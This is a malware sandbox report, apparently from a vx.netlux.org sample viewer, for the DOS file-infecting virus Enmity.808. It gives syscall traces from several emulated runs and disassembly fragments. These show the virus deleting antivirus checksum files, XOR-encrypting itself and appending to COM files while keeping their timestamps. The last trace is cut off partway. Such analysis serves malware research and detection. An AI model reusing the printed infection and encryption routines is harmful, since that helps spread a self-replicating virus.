Sample viewer

vx.netlux.org/Virus.DOS.Enmity.808

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:13.11991574Z 26 PC: 15189 | Set disk transfer address
2018-12-17T22:55:13.121365206Z 71 PC: 15193 | Get current directory
2018-12-17T22:55:13.12405755Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.129588221Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:55:13.13566176Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.141093074Z 65 PC: 153e3 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:55:13.151509459Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.162093797Z 65 PC: 153e3 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:55:13.17285757Z 67 PC: 153df | Get or set file attributes
2018-12-17T22:55:13.178358573Z 65 PC: 153e3 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:55:13.184332496Z 78 PC: 1519b | Find first file
2018-12-17T22:55:13.190480909Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.20662499Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:13.22183564Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.226062666Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.227006999Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.229024598Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.230934842Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.232845594Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.241275275Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.244417768Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.24549Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.250415556Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.252077692Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.258389443Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.262046341Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.264449736Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.266196779Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.272269918Z 61 PC: 152b2 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:55:13.284234212Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.290445973Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.291634449Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.294702778Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.296815206Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.299661666Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.307581048Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.311194108Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.312770056Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.320176853Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.322371321Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.330624624Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.336284931Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.339903213Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.349675409Z 61 PC: 152b2 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:55:13.35682152Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.363429575Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.364583326Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.367199788Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.369437566Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.37241135Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.3821169Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.385668023Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.387430629Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.394652658Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.396375114Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.403890083Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.408377493Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.411586238Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.422299419Z 61 PC: 152b2 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:55:13.429095232Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.436181914Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.437460839Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.439728729Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.442232287Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.445866768Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.45377142Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.456626028Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.457933889Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.464156811Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.465862277Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.473298933Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.47769829Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.480934732Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.490297056Z 61 PC: 152b2 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:55:13.496966237Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.503408798Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.504592885Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.507515118Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.509738579Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.512463947Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.520064848Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.523328045Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.524932298Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.531567304Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.533611257Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.541142042Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.545636147Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.54841601Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.55783107Z 61 PC: 152b2 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:55:13.56431513Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.57369613Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.575231437Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.577726809Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.580579024Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.588949008Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.597450463Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.601152705Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.602842777Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.609913574Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.612433265Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.620379874Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.6253386Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.629097136Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.63982965Z 61 PC: 152b2 | Open file (Filename = 'PAH.COM')
2018-12-17T22:55:13.646630615Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.654239729Z 66 PC: 152ff | Move file pointer
2018-12-17T22:55:13.655996187Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:55:13.658348927Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-17T22:55:13.661192402Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:55:13.665204481Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-17T22:55:13.673406245Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:55:13.677084715Z 66 PC: 15388 | Move file pointer
2018-12-17T22:55:13.679112334Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:55:13.685607701Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.688005376Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.695311956Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.698368179Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.700741049Z 67 PC: 1529d | Get or set file attributes
2018-12-17T22:55:13.70781111Z 61 PC: 152b2 | Open file (Filename = 'TEST.COM')
2018-12-17T22:55:13.715175353Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:55:13.72245535Z 87 PC: 153a7 | Get or set file date and time
2018-12-17T22:55:13.723946574Z 62 PC: 153ab | Close file
2018-12-17T22:55:13.730890046Z 67 PC: 153ba | Get or set file attributes
2018-12-17T22:55:13.735731222Z 79 PC: 1519b | Find next file
2018-12-17T22:55:13.738242001Z 59 PC: 151ac | Change current directory
2018-12-17T22:55:13.742559895Z 71 PC: 151c9 | Get current directory
2018-12-17T22:55:13.745852368Z 59 PC: 151f3 | Change current directory
2018-12-17T22:55:13.756432477Z 59 PC: 1520e | Change current directory
2018-12-17T22:55:13.758433196Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
0x15215: ja 0x15239
0x15217: mov ax, 0xd
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]
0x15220: cld
0x15221: lodsb al, byte ptr [si]
0x15222: or al, al
0x15224: je 0x15230
0x15226: mov ah, 0xe
0x15228: xor bh, bh
0x1522a: mov bl, 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax
0x15232: int 0x16
0x15234: mov ax, 3
0x15237: int 0x10
0x15239: push ax
0x1523a: push bp
2018-12-17T22:55:13.760834654Z 26 PC: 15249 | Set disk transfer address
2018-12-17T22:55:13.763302331Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-17T22:55:13.765832605Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.48927502Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.490918872Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.49354972Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.498914633Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.510131637Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.516104587Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.521530338Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.527308464Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.532831728Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.542855135Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.553343199Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.564828077Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:23.580226442Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.595004908Z 63 PC: 152c7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:31:23.601416035Z 66 PC: 152ff | Move file pointer
2018-12-25T12:31:23.602847732Z 63 PC: 15316 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T12:31:23.606049344Z 44 PC: 1532a | Get time 0x1532a: mov word ptr [bp + 0x40a], dx
0x1532e: mov cx, 0x15
0x15331: lea dx, word ptr [bp + 0x105]
0x15335: pop ax
0x15336: int 0x21
0x15338: push ax
0x15339: push bp
0x1533a: mov bp, sp
0x1533c: mov word ptr [bp + 2], 0x4001
0x15341: pop bp
0x15342: mov cx, 0x178
0x15345: mov dx, word ptr [bp + 0x40a]
0x15349: lea si, word ptr [bp + 0x11a]
0x1534d: lea di, word ptr [bp + 0x4e2]
0x15351: lodsw ax, word ptr [si]
0x15352: xor ax, dx
0x15354: stosw word ptr es:[di], ax
0x15355: loop 0x15351
0x15357: mov cx, 0x2f0
0x1535a: lea dx, word ptr [bp + 0x4e2]
2018-12-25T12:31:23.608198462Z 64 PC: 15338 | Write file or device (Write 21 bytes on handle 5)
2018-12-25T12:31:23.611012105Z 64 PC: 1536c | Write file or device (Write 752 bytes on handle 5)
2018-12-25T12:31:23.620268497Z 64 PC: 15376 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T12:31:23.623083115Z 66 PC: 15388 | Move file pointer
2018-12-25T12:31:23.624583961Z 64 PC: 15392 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:31:23.631772503Z 87 PC: 153a7 | Get or set file date and time
2018-12-25T12:31:23.637823749Z 62 PC: 153ab | Close file
2018-12-25T12:31:23.645780599Z 67 PC: 153ba | Get or set file attributes
2018-12-25T12:31:23.651397433Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.654418293Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.656898592Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.666453531Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.678845912Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.684997434Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.686231431Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.689200312Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.691587266Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.69481722Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.700625943Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.703172138Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.704392094Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.710985131Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.712350574Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.720097027Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.725748948Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.728492082Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.737894467Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.744563238Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.751673675Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.753164101Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.761669976Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.764741558Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.76830475Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.776718856Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.779642879Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.780958416Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.788945624Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.790350374Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.798167136Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.805452908Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.808456142Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.818439687Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.826107697Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.832754741Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.834486595Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.841907516Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.844277456Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.847550946Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.856464443Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.859831482Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.861439321Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.869325679Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.870866786Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.87942853Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.884930458Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.887962116Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.897739087Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.905255886Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.911607379Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.913039034Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.916214502Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:23.918227133Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:23.921079746Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:23.929561376Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:23.932644042Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:23.934360617Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:23.947867481Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:23.950224859Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:23.958137966Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:23.962663916Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:23.964508296Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:23.97679044Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:23.983885311Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:23.991887231Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:23.994856686Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:23.997733311Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.001088536Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.011522116Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.020242371Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.024249378Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.025774058Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.032719907Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.035866264Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.043574958Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.048301678Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.052318603Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.062892743Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.069311777Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.076680816Z 66 PC: 152ff | Move file pointer (See above)
2018-12-25T12:31:24.078048467Z 63 PC: 15316 | Read file or device (See above)
2018-12-25T12:31:24.080359538Z 44 PC: 1532a | Get time (See above)
2018-12-25T12:31:24.082998601Z 64 PC: 15338 | Write file or device (See above)
2018-12-25T12:31:24.086470156Z 64 PC: 1536c | Write file or device (See above)
2018-12-25T12:31:24.094934619Z 64 PC: 15376 | Write file or device (See above)
2018-12-25T12:31:24.09824046Z 66 PC: 15388 | Move file pointer (See above)
2018-12-25T12:31:24.099611931Z 64 PC: 15392 | Write file or device (See above)
2018-12-25T12:31:24.104085768Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.10594395Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.111044093Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.114143396Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.116432483Z 67 PC: 1529d | Get or set file attributes (See above)
2018-12-25T12:31:24.125914585Z 61 PC: 152b2 | Open file (See above)
2018-12-25T12:31:24.13324574Z 63 PC: 152c7 | Read file or device (See above)
2018-12-25T12:31:24.139433202Z 87 PC: 153a7 | Get or set file date and time (See above)
2018-12-25T12:31:24.140774171Z 62 PC: 153ab | Close file (See above)
2018-12-25T12:31:24.147817607Z 67 PC: 153ba | Get or set file attributes (See above)
2018-12-25T12:31:24.152698062Z 79 PC: 1519b | Find next file (See above)
2018-12-25T12:31:24.155056105Z 59 PC: 151ac | Change current directory
2018-12-25T12:31:24.159123579Z 71 PC: 151c9 | Get current directory
2018-12-25T12:31:24.162696166Z 59 PC: 151f3 | Change current directory
2018-12-25T12:31:24.1724774Z 59 PC: 1520e | Change current directory
2018-12-25T12:31:24.173774063Z 44 PC: 15212 | Get time 0x15212: cmp dx, 5
0x15215: ja 0x15239
0x15217: mov ax, 0xd
0x1521a: int 0x10
0x1521c: lea si, word ptr [bp + 0x3a4]
0x15220: cld
0x15221: lodsb al, byte ptr [si]
0x15222: or al, al
0x15224: je 0x15230
0x15226: mov ah, 0xe
0x15228: xor bh, bh
0x1522a: mov bl, 5
0x1522c: int 0x10
0x1522e: jmp 0x15220
0x15230: xor ax, ax
0x15232: int 0x16
0x15234: mov ax, 3
0x15237: int 0x10
0x15239: push ax
0x1523a: push bp
2018-12-25T12:31:24.175728287Z 26 PC: 15249 | Set disk transfer address
2018-12-25T12:31:24.176703617Z 9 PC: 12a51 | Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T12:31:24.178294247Z 76 PC: 12a56 | Terminate with return code (Return code = '0')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11814,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.486026848Z 26 PC: 15189 | Set disk transfer address
2018-12-25T12:31:23.487918032Z 71 PC: 15193 | Get current directory
2018-12-25T12:31:23.496683943Z 67 PC: 153df | Get or set file attributes
2018-12-25T12:31:23.503676171Z 65 PC: 153e3 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T12:31:23.511209087Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.517767601Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.531949891Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.539093579Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.545704829Z 67 PC: 153df | Get or set file attributes (See above)
2018-12-25T12:31:23.552581608Z 65 PC: 153e3 | Delete file (See above)
2018-12-25T12:31:23.559618764Z 78 PC: 1519b | Find first file
2018-12-25T12:31:23.566877298Z 67 PC: 1529d | Get or set file attributes
2018-12-25T12:31:24.162250421Z 61 PC: 152b2 | Open file (Filename = 'SLEEP.COM')
